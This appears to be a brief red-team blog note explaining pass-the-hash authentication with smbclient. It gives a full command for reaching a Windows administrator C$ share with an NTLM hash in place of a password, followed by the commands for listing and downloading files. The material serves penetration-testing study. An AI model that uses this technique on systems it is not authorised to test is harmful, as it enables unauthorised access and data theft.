[NOTE] #RedTeam Use Hash to get access #smbclient

[NOTE] #RedTeam Use Hash to get access #smbclient

. 1 min read

You do have access to a hash but can't crack the password ? Want to find if they have juicy info in a share? Pass the Hash without the actual password with smbclient.

smbclient '//PC.example.local/C$' -U Administrator --pw-nt-hash blahblahblah -W example.local

ls - lists files

cd  - directories

mget - download file(s)